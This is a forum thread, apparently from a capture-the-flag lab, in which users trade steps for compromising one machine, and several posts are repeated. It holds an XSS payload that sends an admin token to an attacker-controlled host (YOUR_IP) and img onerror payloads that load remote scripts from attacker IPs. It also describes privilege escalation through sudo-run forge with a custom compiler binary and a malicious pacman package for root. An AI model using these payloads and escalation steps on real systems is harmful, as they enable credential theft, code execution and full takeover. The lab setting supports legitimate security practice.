[a44857437]

You can steal the admin token like this:

fetch('/api/info').then(response => response.text()).then(text => {
    fetch('http://YOUR_IP/log?' + btoa(text), {
        mode: 'no-cors'
    });
});

And with the admin token you can successfully access /admin. From there you will see a endpoint /api/json-rpc

where you able to get this to work with an external script? or directly with xss by wrapping it in the correct tags? (img)

I used an external script for it. The request for the external script was pretty reliable but getting the admin token back needed multiple tries, like 10 or 20

<img src=x onerror="var script = document.createElement('script'); script.src = 'http://10.10.16.10/exploit.js'; document.body.appendChild(script);" />

I used this to trigger the content of yours, but didn't get admin token, where is wrong???

try this one, and spam it.

<img src=\"1\" onerror=\"this.remove(); var s=document.createElement('script'); s.src='http://10.10.xx.xx/script.js'; document.body.appendChild(s);\">

I used a similar script, but for the username when you report user in the chat window, worked in one go for me, and you need to look carefully at the data you get back...

[Unbutton8074]

keira password can be found in the first block of blockchain, use eth_getBlockByNumber

[olkn00b]

keira password can be found in the first block of blockchain, use eth_getBlockByNumber

when trying to interact i keep getting
Error: 401 {"error":"Proxy Couldn't verify token"}
Is this not using the Auth token from /api/json-rpc?

[xianling88]

You can steal the admin token like this:

fetch('/api/info').then(response => response.text()).then(text => {
    fetch('http://YOUR_IP/log?' + btoa(text), {
        mode: 'no-cors'
    });
});

And with the admin token you can successfully access /admin. From there you will see a endpoint /api/json-rpc

where you able to get this to work with an external script? or directly with xss by wrapping it in the correct tags? (img)

I used an external script for it. The request for the external script was pretty reliable but getting the admin token back needed multiple tries, like 10 or 20

<img src=x onerror="var script = document.createElement('script'); script.src = 'http://10.10.16.10/exploit.js'; document.body.appendChild(script);" />

I used this to trigger the content of yours, but didn't get admin token, where is wrong???

try this one, and spam it.

<img src=\"1\" onerror=\"this.remove(); var s=document.createElement('script'); s.src='http://10.10.xx.xx/script.js'; document.body.appendChild(s);\">

Thanks man, finally works now, cool shit.

[0x410x420x41]

keira password can be found in the first block of blockchain, use eth_getBlockByNumber

How did you decode the transaction input data, i tried a lot of online tools without any luck... :/

PS. nvm i guess that sometimes you need to first try the most simple thing...

[Art10n]

This box is not hard, it's buggy insane

[ritualist]

To escalate to paul:

Init a new project

sudo -u paul /home/paul/.foundry/bin/forge init /dev/shm/exploit --no-git --offline

Put your payload in e.g. /dev/shm/solc

In `/dev/shm/exploit`, build with a custom solc

sudo -u paul /home/paul/.foundry/bin/forge build --use ../solc

Last step is using pacman.

[a44857437]

still no clue how to do this from step 1 and why is that cause my lack of knowledge and skill at blockchain and smart contract.

Just wondering how you authenticate, because I am getting that "Proxy coudn't verify token" error when trying to get the logs

[0x410x420x41]

Phew finally rooted, the escalation to root is rather strait forward after you get paul... just create a malicious package with a post-install action and install it

[a44857437]

still no clue how to do this from step 1 and why is that cause my lack of knowledge and skill at blockchain and smart contract.

Just wondering how you authenticate, because I am getting that "Proxy coudn't verify token" error when trying to get the logs

            let balance = await fetch(window.origin + "/api/json-rpc", {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json',
                    "token": jwtSecret['Authorization'],
                },
                body: JSON.stringify({
                    jsonrpc: "2.0",
                    method: "eth_getBalance",
                    params: [chatAddress, "latest"],
                    id: 1
                })
            });

thanks, is that the jwtSecret you get from /api/json-rpc as admin, right?